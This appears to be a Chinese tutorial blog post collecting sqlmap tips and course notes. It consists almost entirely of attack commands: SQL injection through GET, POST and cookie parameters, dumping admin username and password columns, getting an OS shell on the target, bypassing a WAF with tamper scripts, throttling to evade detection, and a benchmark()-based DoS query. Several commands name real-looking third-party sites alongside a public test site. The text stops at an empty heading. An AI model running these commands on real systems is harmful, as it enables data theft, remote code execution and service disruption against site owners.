本文主要是介绍sqlmap使用技巧总结,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1.sqlmap的get注入假设目标是 http://www.baidu.com/news.php?id=1&data=2
sqlmap语句
列库
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2"--dbs
//假设结果显示库有3个: test1 、test2
获取库test1的表
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2" -Dtest1 --tables
//假设有表3个:admin,user,news
获取admin表的columns
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2" -Dtest1 -T admin --columns
//假设有字段3个:id,username,password
获取id,username,password字段的内容
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2" -Dtest1 -T admin -C "id,usrename,password"
一切顺利的话 这算是完成了一次注入
2.sqlmap的post注射
post肯定要post内容,这个内容一般是表单神马的。可以配合burpsuite,也可以自己手工填写,当然,sqlmap之所以叫做神器,那是因为它自己完全可以搞定
target还是http://www.baidu.com/news.php
post的内容是 username=&password=
可以用sqlmap的随机值,也可以自己随便填下username=admin&password=123
那么sqlmap语句是:
列库
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2"-data="username=admin&password=123" --dbs
后续步骤一样
偷懒不想填post内容可以这样
sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2"--forms
sqlmap自动获取表单,问你是否填写神马的,然后填不填都可以
然后用sqlmap虐sqli-labs的话,我记得lessen4和10 要升到level2才可以
然后是sqlmap的绕过脚本,在最后带上参数 ----tamper "space2morehash.py"
双引号里面的脚本有哪些,有什么作用请呆着疑问往下看。
以上手敲的
下面是 羽翼SQLMAP系列课程笔记
#######################################################################3
常用语句
sqlmap -u http://www.target.com/id=2
--dbs
--tables -D whatA
--columns -D databaseA -T tableA
--dump -D databaseA -T tableA -C "username,password"
=============================================================================================
cookie注入
注入点:http://www.ntjx.org/jsj/DownloadShow.asp?id=9
语句sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie"id=9" --table --level 2
=============================================================================================
post注入
注入点:http://testasp.vulnweb.com/Login.asp
配合Burpsuite:./sqlmap.py -r search-test.txt -p tfUPass
---------------------------------------------------------------------------------------------
自动获取
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
指定参数
sqlmap -u http://testasp.vulnweb.com/Login.asp --data"tfUName=1&tfUPass=1"
=============================================================================================
交互式写shell
---------------------------------------------------------------------------------------------
sqlmap -u http://www.target.com/id=2 --os-cmd=ipconfig
执行ipconfig
sqlmap -u http://www.target.com/id=2 --os-shell
获得一个shell即时执行命令,会生成文件 tmpbxbxz.php 和 tmppuoiuz.php
---------------------------------------------------------------------------------------------
伪静态注入点:http://www.target.com/ndex.php/Index/view/id/40.html
sqlmap -u http://www.target.com/ndex.php/Index/view/id/40*.html--dbs
=============================================================================================
请求延时
注入点:http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html
参数 --delay --safe-freq
sqlmap --dbs -uhttp://www.target.com/ndex.php/Index/view/id/40*.html --delay0.5
sqlmap --dbs -uhttp://www.target.com/ndex.php/Index/view/id/40*.html--safe-freq
=============================================================================================
google关键字找注入点
sqlmap
=============================================================================================
sqlmapDDoS攻击
sqlmap -u http://www.target.com/id=2 --sql-shell
获得一个即时shell,执行
selectbenchmark(99999999999,0x70726f62616e646f70726f
=============================================================================================
sqlmap绕过WAF防火墙
注入点:http://www.target.com/id=2
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3--dbs
tamper文件夹下自行发挥
=============================================================================================
sqlmap查看 权限及可执行函数
sqlmap -u http://www.target.com/id=2 --privileges
######################################################################################
一下是sqlmap的绕过脚本的解释: